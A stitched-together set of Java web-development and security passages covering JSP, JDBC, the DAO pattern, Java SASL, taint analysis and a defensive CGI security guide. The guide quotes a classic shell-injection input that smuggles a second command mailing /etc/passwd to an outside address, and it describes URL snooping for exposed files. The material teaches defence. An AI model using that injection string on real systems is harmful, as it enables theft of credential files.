
Access Models: A Java Server Pages file may be accessed in at least two different ways.
A client's request comes directly into a Java Server Page. In this scenario, suppose the page accesses reusable JavaBean components that perform particular well-defined computations, such as accessing a database. The results of the Bean's computations, called result sets, are stored within the Bean as properties. The page uses such Beans to generate dynamic content and present it back to the client. Whichever way the page is accessed, it could also contain any valid Java code. Java Server Pages architecture encourages separation of content from presentation.
JDBC versus ODBC and other APIs
At this point, Microsoft's ODBC (Open Database Connectivity) API is probably the most widely used programming interface for accessing relational databases. It offers the ability to connect to almost all databases on almost all platforms. So why not just use ODBC from Java? The answer is that you can use ODBC from Java, but this is best done with the help of JDBC in the form of the JDBC-ODBC Bridge, which we will cover shortly. The question now becomes "Why do you need JDBC?" There are several answers to this question:
1. ODBC is not appropriate for direct use from Java because it uses a C interface. Calls from Java to native C code have a number of drawbacks in the security, implementation, robustness, and automatic portability of applications.
2. A literal translation of the ODBC C API into a Java API would not be desirable. For example, Java has no pointers, and ODBC makes copious use of them, including the notoriously error-prone generic pointer "void *". You can think of JDBC as ODBC translated into an object-oriented interface that is natural for Java programmers.
3. ODBC is hard to learn. It mixes simple and advanced features together, and it has complex options even for simple queries. JDBC, on the other hand, was designed to keep simple things simple while allowing more advanced capabilities where required.
4. A Java API like JDBC is needed in order to enable a "pure Java" solution. When ODBC is used, the ODBC driver manager and drivers must be manually installed on every client machine. When the JDBC driver is written completely in Java, however, JDBC code is automatically installable, portable, and secure on all Java platforms from network computers to mainframes.
JDBC-ODBC Bridge
If possible, use a pure Java JDBC driver instead of the Bridge and an ODBC driver. This completely eliminates the client configuration required by ODBC. It also eliminates the potential that the Java VM could be corrupted by an error in the native code brought in by the Bridge (that is, the Bridge native library, the ODBC driver manager library, the ODBC driver library, and the database client library).
What Is the JDBC-ODBC Bridge?
The JDBC-ODBC Bridge is a JDBC driver that implements JDBC operations by translating them into ODBC operations. To ODBC it appears as a normal application program. The Bridge implements JDBC for any database for which an ODBC driver is available. The Bridge is implemented as the sun.jdbc.odbc Java package and contains a native library used to access ODBC. The Bridge is a joint development of Intersolv and JavaSoft.
The majority of dynamic Web front ends are based on HTML forms, and users of such applications have come to expect from these applications certain behaviours, such as form validation. With standard JSP, this is a tedious process that involves recording the contents of the form and populating every form element with information from a JavaBean in case of error. Java facilitates this sort of form processing and validation using Custom tags. These, in combination with the JSP tag libraries, make View development with forms really simple and natural.
What is Model-View-Controller?
Let's start by looking at how the Model, the View, and the Controller interact with one another:
Figure 1: Model 2/MVC architecture
DESIGN PATTERN Data Access Object
Context
Access to data varies depending on the source of the data. Access to persistent storage, such as to a database, varies greatly depending on the type of storage (relational databases, object-oriented databases, flat files, and so forth) and the vendor implementation.
Problem
Applications can use the JDBC API to access data residing in a relational database management system (RDBMS). The JDBC API enables standard access and manipulation of data in persistent storage, such as a relational database. The JDBC API enables J2EE applications to use SQL statements, which are the standard means for accessing RDBMS tables. However, even within an RDBMS environment, the actual syntax and format of the SQL statements may vary depending on the particular database product. There is even greater variation with different types of persistent storage. Access mechanisms, supported APIs, and features vary between different types of persistent stores such as RDBMS, object-oriented databases, flat files, and so forth.
Such disparate data sources offer challenges to the application and can potentially create a direct dependency between application code and data access code. When business components -- entity beans, session beans, and even presentation components like servlets and helper objects for Java Server Pages (JSP) pages -- need to access a data source, they can use the appropriate API to achieve connectivity and manipulate the data source. But including the connectivity and data access code within these components introduces a tight coupling between the components and the data source implementation. Such code dependencies in components make it difficult and tedious to migrate the application from one type of data source to another. When a data source changes, the components need to be changed to handle the new type of data source.
Forces
Portability of the components is directly affected when specific access mechanisms and APIs are included in the components. Components need to be transparent to the actual persistent store or data source implementation to provide easy migration to different vendor products, different storage types, and different data source types.
Solution
Use a Data Access Object (DAO) to abstract and encapsulate all access to the data source. The DAO manages the connection with the data source to obtain and store data. The DAO implements the access mechanism required to work with the data source. The data source could be a persistent store like an RDBMS, an external service like a B2B exchange, a repository like an LDAP database, or a business service accessed via CORBA Internet InterORB Protocol (IIOP) or low-level sockets. The business component that relies on the DAO uses the simpler interface exposed by the DAO for its clients. The DAO completely hides the data source implementation details from its clients. Because the interface exposed by the DAO to clients does not change when the underlying data source implementation changes, this pattern allows the DAO to adapt to different storage schemes without affecting its clients or business components. Essentially, the DAO acts as an adapter between the component and the data source.
Participants and Responsibilities

Business Object
The Business Object represents the data client. It is the object that requires access to the data source to obtain and store data. A Business Object may be implemented as a session bean, entity bean, or some other Java object, in addition to a servlet or helper bean that accesses the data source.
DataAccessObject
The DataAccessObject is the primary object of this pattern. The DataAccessObject abstracts the underlying data access implementation for the Business Object to enable transparent access to the data source. The Business Object also delegates data load and store operations to the DataAccessObject.
Transfer Object
This represents a Transfer Object used as a data carrier. The DataAccessObject may use a Transfer Object to return data to the client. The DataAccessObject may also receive the data from the client in a Transfer Object to update the data in the data source.
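The three participants described above can be sketched in a few lines of Java. This is only an illustrative sketch, not code from the pattern's authors: the names CustomerTO, CustomerDAO, InMemoryCustomerDAO, and CustomerService are hypothetical, and an in-memory map stands in for the real data source so that the example runs without a database.

```java
import java.util.HashMap;
import java.util.Map;
import java.util.Optional;

public class DaoSketch {

    /** Transfer Object: a plain data carrier (hypothetical customer record). */
    static final class CustomerTO {
        final int id;
        final String name;

        CustomerTO(int id, String name) {
            this.id = id;
            this.name = name;
        }
    }

    /** DataAccessObject interface: the only view of storage the business code sees. */
    interface CustomerDAO {
        Optional<CustomerTO> findById(int id);

        void save(CustomerTO customer);
    }

    /** One concrete DAO; a map stands in for an RDBMS, LDAP directory, and so on. */
    static final class InMemoryCustomerDAO implements CustomerDAO {
        private final Map<Integer, CustomerTO> rows = new HashMap<>();

        @Override
        public Optional<CustomerTO> findById(int id) {
            return Optional.ofNullable(rows.get(id));
        }

        @Override
        public void save(CustomerTO customer) {
            rows.put(customer.id, customer);
        }
    }

    /** Business Object: depends on the DAO interface, never on a storage technology. */
    static final class CustomerService {
        private final CustomerDAO dao;

        CustomerService(CustomerDAO dao) {
            this.dao = dao;
        }

        void rename(int id, String newName) {
            dao.save(new CustomerTO(id, newName));
        }

        String nameOf(int id) {
            return dao.findById(id).map(c -> c.name).orElse("(unknown)");
        }
    }

    public static void main(String[] args) {
        CustomerService service = new CustomerService(new InMemoryCustomerDAO());
        service.rename(1, "Ada");
        System.out.println(service.nameOf(1));
        System.out.println(service.nameOf(2));
    }
}
```

Migrating to another data source would, under these assumptions, mean writing a second CustomerDAO implementation (for example one backed by JDBC) and passing it to CustomerService; the business object itself would not change.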
Consequences:
Enables Transparency
Business objects can use the data source without knowing the specific details of the data source's implementation. Access is transparent because the implementation details are hidden inside the DAO.
Enables Easier Migration
A layer of DAOs makes it easier for an application to migrate to a different database implementation. The business objects have no knowledge of the underlying data implementation. Thus, the migration involves changes only to the DAO layer. Further, if employing a factory strategy, it is possible to provide a concrete factory implementation for each underlying storage implementation. In this case, migrating to a different storage implementation means providing a new factory implementation to the application.
Reduces Code Complexity in Business Objects
Because the DAOs manage all the data access complexities, they simplify the code in the business objects and other data clients that use the DAOs. All implementation-related code (such as SQL statements) is contained in the DAO and not in the business object. This improves code readability and development productivity.
Centralizes All Data Access into a Separate Layer
Because all data access operations are now delegated to the DAOs, the separate data access layer can be viewed as the layer that can isolate the rest of the application from the data access implementation. This centralization makes the application easier to maintain and manage.
SASL (Simple Authentication and Security Layer) is a framework into which specific authentication mechanisms that specify the contents and semantics of the authentication data can fit. There are many standard SASL mechanisms defined by the Internet community for various security levels and deployment scenarios. The Java SASL API defines classes and interfaces for applications that use SASL mechanisms. It is defined to be mechanism-neutral; an application that uses the API need not be hardwired into using any particular SASL mechanism. Applications can select the mechanism to use based on desired security features. The API supports both client and server applications. The javax.security.sasl.Sasl class is used to create SaslClient and SaslServer objects. SASL mechanism implementations are supplied in provider packages. Each provider may support one or more SASL mechanisms and is registered and invoked via the standard provider architecture. The Java platform includes a built-in provider that implements the following SASL mechanisms:
CRAM-MD5, DIGEST-MD5, EXTERNAL, GSSAPI, and PLAIN client mechanisms
CRAM-MD5, DIGEST-MD5, and GSSAPI server mechanisms
GSS-API and Kerberos
The Java platform contains an API with the Java language bindings for the Generic Security Service Application Programming Interface (GSS-API). GSS-API offers application programmers uniform access to security services atop a variety of underlying security mechanisms. The Java GSS-API currently requires use of a Kerberos v5 mechanism, and the Java platform includes a built-in implementation of this mechanism. At this time, it is not possible to plug in additional mechanisms. Before two applications can use the Java GSS-API to securely exchange messages between them, they must establish a joint security context. The context encapsulates shared state information that might include, for example, cryptographic keys. Both applications create and use an org.ietf.jgss.GSSContext object to establish and maintain the shared information that makes up the security context. Once a security context has been established, it can be used to prepare secure messages for exchange. The Java GSS APIs are in the org.ietf.jgss package. The Java platform also defines basic Kerberos classes, like KerberosPrincipal and KerberosTicket, which are located in the javax.security.auth.kerberos package.
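As a rough illustration of the SASL part of the description above, the sketch below asks javax.security.sasl.Sasl for a client of the PLAIN mechanism and produces its initial response. The user name, password, protocol name "imap", and server name "mail.example.com" are made-up values for the example, and PLAIN is chosen only because it needs no network or Kerberos setup; it sends the password unprotected and would normally be used only over an encrypted channel.

```java
import java.nio.charset.StandardCharsets;
import javax.security.auth.callback.Callback;
import javax.security.auth.callback.CallbackHandler;
import javax.security.auth.callback.NameCallback;
import javax.security.auth.callback.PasswordCallback;
import javax.security.auth.callback.UnsupportedCallbackException;
import javax.security.sasl.Sasl;
import javax.security.sasl.SaslClient;
import javax.security.sasl.SaslException;

public class SaslSketch {

    /** Creates a PLAIN client; the mechanism asks the handler for name and password. */
    static SaslClient newPlainClient(String user, char[] password) {
        CallbackHandler handler = callbacks -> {
            for (Callback cb : callbacks) {
                if (cb instanceof NameCallback) {
                    ((NameCallback) cb).setName(user);
                } else if (cb instanceof PasswordCallback) {
                    ((PasswordCallback) cb).setPassword(password);
                } else {
                    throw new UnsupportedCallbackException(cb);
                }
            }
        };
        try {
            // Protocol and server name are hypothetical values for this sketch.
            // The call returns null if no provider supports the requested mechanism.
            return Sasl.createSaslClient(
                    new String[] {"PLAIN"}, null, "imap", "mail.example.com", null, handler);
        } catch (SaslException e) {
            throw new IllegalStateException(e);
        }
    }

    /** Returns the client's first message with NUL separators made visible. */
    static String initialResponse(SaslClient client) {
        try {
            byte[] response = client.hasInitialResponse()
                    ? client.evaluateChallenge(new byte[0])
                    : new byte[0];
            return new String(response, StandardCharsets.UTF_8).replace("\0", "<NUL>");
        } catch (SaslException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        SaslClient client = newPlainClient("alice", "secret".toCharArray());
        System.out.println(client.getMechanismName());
        System.out.println(initialResponse(client));
    }
}
```

The application code never names a mechanism-specific class; swapping "PLAIN" for another mechanism name is the only change needed on the client side, which is the mechanism neutrality the API is designed for.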
Data flow between a server and its client with regard to JSP: The JSP engine sends the request to whatever server-side component the JSP file specifies. The component handles the request, possibly retrieving data from a database or other data store, and passes the response object to the JSP page, where its data is formatted according to the page's HTML design. The JSP engine and web server then send the revised JSP page back to the client, where the user can view the results in the web browser. The diagrammatic representation of data flow between a server and a client is shown below:
[Figure: Request and Response arrows linking the Client, the JSP Engine & Web server, the .JSP File, and the Component]
1. The JSP engine will translate the requested JSP file into a Java file.
2. It will compile the Java file to generate a servlet class.
3. It will create an object of the respective servlet class to process the client request along with request and response objects.
4. It provides some predefined objects.
5. It provides some tags. These tags are used to insert the required Java code at the various positions in the corresponding Java file generated by the JSP engine.
6. It also provides servlet context and session tracking facilities.
By now almost everyone using servlets has heard about JavaServer Pages (JSP), a Sun-invented technology built on top of servlets. Sun has done a marvelous job promoting JSP as a way to get HTML out of servlet code, speeding web application development and improving web page maintenance. In fact, the official "Application Programming Model" document published by Sun has gone so far as to say, "JSP technology should be viewed as the norm while the use of servlets will most likely be the exception." (Section 1.9, December 15, 1999, Draft Release) This paper evaluates whether that claim is valid -- by comparing JSP to another technology built on servlets: template engines.
One can write a single program using the JDBC API, and the program will be able to send SQL statements to the appropriate database.
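A minimal sketch of that idea follows. The same code works against any database for which a JDBC driver is on the classpath; only the JDBC URL changes. The table name customers, its columns, and the URL jdbc:exampledb:demo are hypothetical and stand in for whatever database is actually used.

```java
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;

public class JdbcSketch {

    /** True if some registered JDBC driver accepts the given URL. */
    static boolean hasDriverFor(String jdbcUrl) {
        try {
            DriverManager.getDriver(jdbcUrl);
            return true;
        } catch (SQLException noSuitableDriver) {
            return false;
        }
    }

    /** Looks up a name by id; table and column names are hypothetical. */
    static String findCustomerName(String jdbcUrl, int id) throws SQLException {
        String sql = "SELECT name FROM customers WHERE id = ?";
        try (Connection con = DriverManager.getConnection(jdbcUrl);
             PreparedStatement ps = con.prepareStatement(sql)) {
            ps.setInt(1, id); // the value is bound, not concatenated into the SQL
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() ? rs.getString("name") : null;
            }
        }
    }

    public static void main(String[] args) throws SQLException {
        // Pass a real JDBC URL as the first argument to run the query.
        String url = args.length > 0 ? args[0] : "jdbc:exampledb:demo";
        if (hasDriverFor(url)) {
            System.out.println(findCustomerName(url, 1));
        } else {
            System.out.println("No JDBC driver on the classpath for " + url);
        }
    }
}
```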
A recent empirical study of vulnerabilities found that parameter tampering, SQL injection, and cross-site scripting attacks account for more than a third of all reported Web application vulnerabilities. While different on the surface, all types of attacks listed above are made possible by user input that has not been (properly) validated. This set of problems is similar to those handled dynamically by the taint mode in Perl [52], even though our approach is considerably more extensible. We refer to this class of vulnerabilities as the tainted object propagation problem.
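To make the problem concrete, here is a small sketch of how unvalidated input changes the meaning of a SQL statement, together with two common countermeasures. It is an illustration only, not the analysis described in this paper: the users table, the user-name rule, and all method names are assumptions made for the example.

```java
import java.util.regex.Pattern;

public class TaintSketch {

    // Hypothetical rule for what a user name may look like.
    private static final Pattern USER_NAME = Pattern.compile("[A-Za-z0-9_]{1,32}");

    /** Vulnerable: tainted input flows straight into the SQL text. */
    static String unsafeQuery(String userName) {
        return "SELECT * FROM users WHERE name = '" + userName + "'";
    }

    /** Validation step: accept only input that matches the expected shape. */
    static boolean isValidUserName(String input) {
        return input != null && USER_NAME.matcher(input).matches();
    }

    /** Safer: constant SQL text; the value is bound later with PreparedStatement.setString. */
    static String parameterizedQuery() {
        return "SELECT * FROM users WHERE name = ?";
    }

    public static void main(String[] args) {
        String attack = "x' OR '1'='1";
        System.out.println(unsafeQuery(attack));      // the WHERE clause now matches every row
        System.out.println(isValidUserName(attack));  // the validator rejects the input
        System.out.println(parameterizedQuery());     // the SQL text never contains user data
    }
}
```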
1.2 Code Auditing for Security
Many attacks described in the previous section can be detected with code auditing. Code reviews pinpoint potential vulnerabilities before an application is run. In fact, most Web application development methodologies recommend a security assessment or review step as a separate development phase after testing and before application deployment. Code reviews, while recognized as one of the most effective defence strategies, are time-consuming and costly, and are therefore performed infrequently. Security auditing requires security expertise that most developers do not possess, so security reviews are often carried out by external security consultants, thus adding to the cost. In addition to this, because new security errors are often introduced as old ones are corrected, double audits (auditing the code twice) are highly recommended. The current situation calls for better tools that help developers avoid introducing vulnerabilities during the development cycle.
1.3 Static Analysis
This paper proposes a tool based on a static analysis for finding vulnerabilities caused by unchecked input. Users of the tool can describe vulnerability patterns of interest succinctly in PQL, which is an easy-to-use program query language with a Java-like syntax. Our tool, as shown in Figure 1, applies user-specified queries to Java bytecode and finds all potential matches statically. The results of the analysis are integrated into Eclipse, a popular open-source Java development environment [13], making the potential vulnerabilities easy to examine and fix as part of the development process. The advantage of static analysis is that it can find all potential security violations without executing the application. The use of bytecode-level analysis obviates the need for the source code to be accessible. This is especially important since libraries whose source is unavailable are used extensively in Java applications. Our approach can be applied to other forms of bytecode such as MSIL, thereby enabling the analysis of C# code. Our tool is distinctive in that it is based on a precise context-sensitive pointer analysis that has been shown to scale to large applications. This combination of scalability and precision enables our analysis to find all vulnerabilities matching a specification within the portion of the code that is analyzed statically. In contrast, previous practical tools are typically unsound. Without a precise analysis, these tools would find too many potential errors, so they only report a subset of errors that are likely to be real problems. As a result, they can miss important vulnerabilities in programs.
3.1 Security issues in CGI
CGI scripts are as dangerous as they are useful. This is not to say that you should not use them. Computer security is a give and take situation. You can never be safe so long as you offer services. However, without offering services you may as well not have the computer in the first place. Thus, security becomes more about acceptable risk and emergency recovery than impregnability. It is your job to make sure that the cons of a break-in have far less impact than the pros of having a web site. Selena discusses the fundamental concerns of security when installing and customizing pre-built CGI scripts, and gives pointers to further information.
"All data is fraudulent. All communications are attempted hacks. All clients are thieves. Technology is only my first line of defense" - morning litany for a Web Server Administrator
The minute you connect your computer to the Internet is the minute that the security of your data has been compromised. Even the most secure systems, shepherded by the most intelligent and able system administrators, and employing the most up-to-date, tested software available are at risk every day, all day. As was proven by Kevin Mitnick in the celebrated cracking of the San Diego Supercomputer Center in 1994, even seasoned security veterans like Tsutomu Shimomura can be cracked. The sad fact is that crackers will always have the upper hand. Time, persistence, creativity, the complexity of software and the server environment, and the ignorance of the common user are their weapons. The system administrator must juggle dozens of ever-changing, complex security-related issues at once while crackers need only wait patiently for any slip-up. And of course, system administrators are only human. Thus, the system administrator's job certainly cannot be to build a "cracker-proof" environment. Rather, the system administrator can only hope to build a "cracker-resistant" environment. A cracker-resistant environment is one in which everything is done to make the system "as secure as possible" while making provisions such that successful cracks cause as little damage as possible. Thus, for example, at minimum the system administrator should back up all of the data on a system so that if the data is maliciously or accidentally erased or modified, as much of it as possible can be restored. By the way, don't think that just because your job title is not officially "system administrator" this does not apply to you. In fact, as soon as you implement a CGI script, you become a system administrator of sorts. For example, the implementer of a Web Store CGI script will have her own users, data files, and security concerns.
Here is a good rough check list of minimum level security precautions:
Make sure users understand what a good password is and what a bad password is. Good passwords cannot be found in a dictionary and take advantage of letters, numbers and symbols. Good passwords are also changed with some regularity and are not written on scraps of paper in desk drawers.
Make sure that file permissions are set correctly.
Make sure to keep abreast of security announcements, bug fixes and patches. For example, put yourself on a CERT or CIAC mailing list and/or return regularly to the sites which distribute the code you use.
Attempt to crack your site regularly. Learn the tools the crackers are using against you and try your best to use those tools to crack yourself.
Make regular backups.
Create and check your log files regularly.
The security managers in both JDK and Netscape typically use the contents of the call stack to decide whether or not to grant access. Java uses its type system to provide protection for the security manager. If Java's type system is sound, then the security manager should be tamperproof. By using types, instead of separate address spaces for protection, Java is embeddable in other software, and performs better because protection boundaries can be crossed without a context switch.
What is the worst that can happen?
Protecting your site is a serious matter and one that everyone should take time to deal with. Unfortunately, too many web admins make the mistake of saying, "Since I am not a high visibility site, and I don't have a beef with anyone else, no one will bother to mess with me." In fact, you are a target as soon as you have a web presence. Many crackers need no greater excuse than the desire to cause mischief to crack your site. Once a cracker has access to your system, he or she can do all sorts of mean and nasty things. Consider some of the following possibilities:
Your data/files are erased.
Your data/files are sold to your competitor.
Your data/files are modified. Check out what happened to the CIA site and others!
The cracker uses your site to launch attacks against others. For example, the cracker attempts to crack the White House server as you!
Security and Web Servers
Web servers are one of the most dangerous services you can offer. Essentially, a web server gives the entire net access to the inner workings of your file system. What is worse is the fact that since web server software has only been around since the end of the 1980's, the security community has only had a limited amount of time to scrutinize security holes. Thus, web servers amount to extremely powerful programs which have only been partially bug tested. If that were not bad enough, web servers are typically administered by new admins with perhaps more experience in graphic design than server administration. Further, many web servers are home to hundreds of users who barely know enough about computers to write HTML and who are often too busy with their own deadlines to take a moment to read articles such as this! This is not to point fingers at anyone. Few people have time or inclination to master security and that is as it should be. The point is that bad passwords, poorly written programs, world readable files and directories and so forth will always be part of the equation.
CGI Scripts
Beyond the fact that web servers are insecure to begin with, web servers make a bad situation worse by allowing users to take advantage of CGI scripts. CGI scripts are programs that reside on a server and can be run from a web browser. In other words, CGI scripts allow Joe Cyberspace to execute powerful programs on your server which are in all likelihood first generation, designed by amateurs, and full of security holes. Yet, since most users have grown to expect CGI access, few system administrators can deny their users the ability to write, install and make public CGI scripts of all sorts. So what is a web master to do and how can users of CGI scripts help to promote the security of the server as a whole? As is the case with all security, the admin and users must attempt to address the following precautions:
CGI scripts must be made "as safe as possible".
The inevitable damages caused by cracked CGI scripts must be contained.
Reviewing Scripts
Needless to say, every script installed on a server should be reviewed by as many qualified people as possible. At very least the system administrator should be given a copy of the code (before and after your modifications), information about where you got the code, and anything else she asks for. Don't think of your system administrator as a paranoid fascist. She has a very serious job to do. Help her to facilitate a safer environment for everyone even if that means a little more work for you. Besides that, you should read the code yourself! There is no better time to learn this stuff than now. Although ignorant users will necessarily be part of the security equation, that does not give you the go-ahead to be one of those users! And remember, any bit of code you do not understand is suspect! As a customer, demand that script authors explain and document their code clearly and completely. However, you have a further responsibility. You have the responsibility to keep aware of patches, bug fixes, and security announcements. It is likely that such information will be posted on the site from which you got the script. It certainly is posted on my Script Archive. As new versions come out, you should do your best to upgrade, and when security announcements are issued, you must make the necessary modifications as soon as possible. The fact that the information is available to you means that the information is also available to crackers who will probably use it as soon as it is available. This point is particularly important for all you freelance CGI developers who install scripts for clients and then disappear into the sunset. It is essential that you take the responsibility to develop an ongoing relationship with your clients so that when security patches are released you can notify them so they can hire you or someone else to implement the security changes.
Writing Safe CGI Scripts
Although this article is primarily focussed on installing and customizing pre-built web scripts, no discussion of security would be complete without a note on writing safe code. After all, some of the installation/customization work you do might involve writing some code. Perhaps the best source for information on writing safe CGI scripts is Lincoln Stein's WWW Security FAQ. Lincoln Stein is a gifted CGI programmer with several public domain talks and FAQs regarding techniques for writing safe CGI. You should not even consider writing or installing a CGI script until you have read the entire FAQ! However, I will reproduce the most important warning since it should be said several times. Stein writes the following:
"Never, never, never pass unchecked remote user input to a shell command. In C this includes the popen(), and system() commands, all of which invoke a /bin/sh subshell to process the command. In Perl this includes system(), exec(), and piped open() functions as well as the eval() function for invoking the Perl interpreter itself. In the various shells, this includes the exec and eval commands. Backtick quotes, available in shell interpreters and Perl for capturing the output of programs as text strings, are also dangerous. The reason for this bit of paranoia is illustrated by the following bit of innocent-looking Perl code that tries to send mail to an address indicated in a fill-out form.
    $mail_to = &get_name_from_input; # read the address from form
    open (MAIL,"| /usr/lib/sendmail $mail_to");
    print MAIL "To: $mailto\nFrom: me\n\nHi there!\n";
    close MAIL;
The problem is in the piped open() call. The author has assumed that the contents of the $mail_to variable will always be an innocent e-mail address.
But what if the wiley hacker passes an e-mail address that looks like this?
    nobody@nowhere.com; mail badguys@hell.org</etc/passwd;
Now the open() statement will evaluate the following commands:
    /usr/lib/sendmail nobody@nowhere.com
    mail badguys@hell.org</etc/passwd
Unintentionally, open() has mailed the contents of the system password file to the remote user, opening the host to password cracking attack."
Other CGI security FAQs include: NCSA Security
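The same two defences, checking the input and keeping it away from a shell, can be sketched in Java. This is an illustration under stated assumptions rather than anything taken from Stein's FAQ: the address pattern is a deliberately strict, hypothetical whitelist, and the class and method names are invented for the example. The argument list it builds is meant to be handed to java.lang.ProcessBuilder, which starts the program directly instead of passing a command line to /bin/sh, so characters such as ";" and "<" carry no special meaning.

```java
import java.util.Arrays;
import java.util.List;
import java.util.regex.Pattern;

public class SafeMailSketch {

    // Hypothetical whitelist: starts with a letter or digit, one "@", no shell metacharacters.
    private static final Pattern ADDRESS = Pattern.compile(
            "[A-Za-z0-9][A-Za-z0-9._%+-]*@[A-Za-z0-9.-]+\\.[A-Za-z]{2,}");

    /** True only if the whole input looks like a plain e-mail address. */
    static boolean isPlainAddress(String input) {
        return input != null && ADDRESS.matcher(input).matches();
    }

    /** Builds the argument list for sendmail; rejects anything that fails the whitelist. */
    static List<String> sendmailCommand(String recipient) {
        if (!isPlainAddress(recipient)) {
            throw new IllegalArgumentException("rejected recipient");
        }
        // Each element is one argument; no shell ever parses the recipient.
        return Arrays.asList("/usr/lib/sendmail", recipient);
    }

    public static void main(String[] args) {
        String attack = "nobody@nowhere.com; mail badguys@hell.org</etc/passwd;";
        System.out.println(isPlainAddress("nobody@nowhere.com"));
        System.out.println(isPlainAddress(attack));
        // A real program would now call: new ProcessBuilder(sendmailCommand(addr)).start()
        System.out.println(sendmailCommand("nobody@nowhere.com"));
    }
}
```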
Stopping Snoopers
Have you ever investigated a web site by modifying the URL? For example, let's look at the 1990 U.S. Census Page at the Lawrence Berkeley Lab which can be found at http://cedr.lbl.gov/cdrom/doc/lookup_doc.html. Notice that we are looking at the document lookup_doc.html, which is in the directory "doc", which is located in the "cdrom" directory, which is itself a root-level directory of the web server "cedr.lbl.gov". Suppose we are interested in what other documents are located in the "doc" directory (perhaps documents under development, documents which have been forgotten about, or documents which might have unlisted links for internal use only). In this case, we remove the "lookup_doc.html" reference and test to see if they have set their web server to generate a dynamic index. In this case, they have. Here is what we get when we remove the lookup_doc.html ending: What you are looking at is a dynamically created index page containing all files and sub-directories. In fact, many servers on the web are configured so that if the user has not provided an index.html file, the server will output a directory listing much like this. If the server is set to produce a dynamically generated index of a cgi-bin directory, the results can be devastating. Consider the following figure in which we see that the entire contents of a cgi directory are displayed to the web user: What do you suppose will happen when a user clicks on the auth.setup file? Well, since the web server must execute this CGI script, the web server will certainly have permission to read the contents of the file. Thus the cracker will receive the contents of your setup file in their web browser window. As you might imagine, this file could easily include crucial bits of security, path, and configuration information which in the hands of the cracker could be the end of you. Needless to say, setup files are not the only files at risk. Other files include password files, temporary working files, user files, and anything else that might give the cracker information about how to break your program for his/her own benefit. As such, it is essential that you do one or all of the following things:
Configure the web server to not generate dynamically produced indexes but return an error message instead.
Configure your web server to not serve any document other than a .cgi document from within a cgi-bin directory tree.
Provide an index.html file with nothing in it so that even if the web server is not configured for CGI security, the cracker will be stopped in their tracks.
There is another aspect of the snooper that you should definitely be aware of when installing pre-built scripts. Snoopers have just as much ability to download the source code and read through it as you do. Thus, they are aware of all of the preconfigured options that are set by default. In particular, they are aware of filenames and relative directory locations. Thus, if you do not change the default names of files and directories, even if you have stopped them from using the back door and getting directory listings as shown above, they will still know what is available and can access it directly. In other words, if I know that you are using "CGI script A" and that "CGI script A" uses a file called "users.dat" in a subdirectory called "Users", I might look for it directly using: http://www.yourdomain.com/cgi-bin/ScriptA/Users/users.dat In such a way, a cracker could easily gain sensitive information. As a result, it is crucial that you also rename any file or directory that contains sensitive information. Once you have made it impossible for the cracker to get a dynamically generated index and you have changed all filenames and directory names, it will be much more difficult for the cracker to find his/her way in.
Writable Directories
It is pretty much unavoidable. Any truly complex CGI application is going to have to write to the file system. Examples of writing to the file system include adding to a password file of registered users, creating lock and log files, or creating temporary state maintenance files.

The problem with this is twofold. First, if the web surfer is given permission to write, she is also necessarily given permission to delete. Writing and deleting come hand in hand. They are considered equal in terms of server security. The second problem with writable files is that a cracker could use the writable area within your cgi-bin tree to add a CGI script of their own! This is particularly dangerous on multi-user servers such as those used by your typical ISP. A cracker need only get a legitimate account at the same ISP you are on long enough to exploit the security hole. This amounts to 20 minutes' worth of payment on their part.

By the way, this cracker tactic of getting an account on your ISP also has serious implications for "snooping". If the cracker can get an account on your server, there is little to stop her from getting at your cgi-bin directory and snooping around. With luck, your ISP runs a CGI wrapper which will obfuscate your cgi-bin area to some degree, but one way or the other, so long as you host your website on a shared server, your security is seriously compromised. This makes backups even more crucial!

For the most part, the solution to this is to never store writable directories or files within your cgi-bin tree. All writable directories should be stored in less sensitive areas such as your HTML tree or in directories like /tmp which are already provided for insecure file manipulation. A cracker could still erase your data but they could not execute their own rogue CGI script. Thus, not only should you change the names of all files in CGI scripts, but you should also move them to safer locations on your server.
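A script can guard against a misconfigured setup file by checking, before it writes anything, that its data path does not sit inside the cgi-bin tree. The following is a minimal sketch in Python; the function names and the example paths are hypothetical and are not taken from any particular script.

```python
import os


def is_inside(path: str, tree: str) -> bool:
    """Return True if path is the directory tree itself or lies beneath it."""
    path = os.path.abspath(path)
    tree = os.path.abspath(tree)
    # commonpath compares whole path components, so "cgi-bin-old"
    # is not mistaken for something inside "cgi-bin".
    return os.path.commonpath([path, tree]) == tree


def check_writable_location(data_path: str, cgi_root: str) -> None:
    """Refuse to use a writable file that lives inside the CGI tree."""
    if is_inside(data_path, cgi_root):
        raise ValueError(f"{data_path} must not be stored under {cgi_root}")
```

Calling check_writable_location once at startup, with the values read from the setup file, turns a silent security hole into an immediate and visible error.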
If the CGI script you are using is good, it should have all of this file naming and location information in a setup file so you do not have to muck around in the code.

However, as we said before, security is as much about constraining damage as it is about plugging holes. Thus, it is essential that you protect all files against writing unless you are currently working on them. In other words, if you are not editing an HTML file, it should be set to read-only access. If you are not currently editing the code of a CGI script, it should be stored as read-execute-only. In short, never grant write permission to any file on your web server unless you are specifically editing that file.

Finally, back up your files regularly. Expect and prepare for the worst. If you are on a UNIX system, you should tar your entire site at least once every few days using the command

tar cvfp name.tar rootdirectoryname

You should then move that file onto a non-network connected machine or at very least set permissions such as: chmod 400

Windows users should use a program like WinZip95 to create archives.

User Input

All input is an attempted hack. All input is an attempted hack. All input is an attempted hack. Learn those words and repeat them to yourself every day. It is essential for you to consider all information that comes into your CGI script as tainted. The example provided by Lincoln Stein above is a good example of the kinds of havoc a cracker can create with tainted data. A cracker could easily attempt to use your CGI to execute damaging commands.

An interesting addition to what Stein has to say relates to Server Side Includes (SSI). That is, if your server is set to execute server side includes, it is possible that your CGI script could be used to execute illegitimate code. Specifically, if the CGI script allows a user to input text that will be echoed back to the web browser window, the cracker could easily input SSI code. This is a common misconfiguration error for programs like Guestbooks. The solution to this problem, of course, is to filter all user data and remove any occurrence of SSI commands. Typically, this is done by changing all occurrences of "<!" to "<-". Thus, SSI commands will be printed out instead of executed. A better option is to disable SSI, which is even more dangerous than CGI, especially when combined with CGI.

Another thing to understand about the legitimacy of incoming data is that even the data which is supposedly generated administratively can be tainted. It is very easy, for example, to modify hidden form fields or add custom fields to incoming form data to a script. In fact, a cracker could simply download your HTML form, modify it and submit faulty data to your CGI script from their own server.
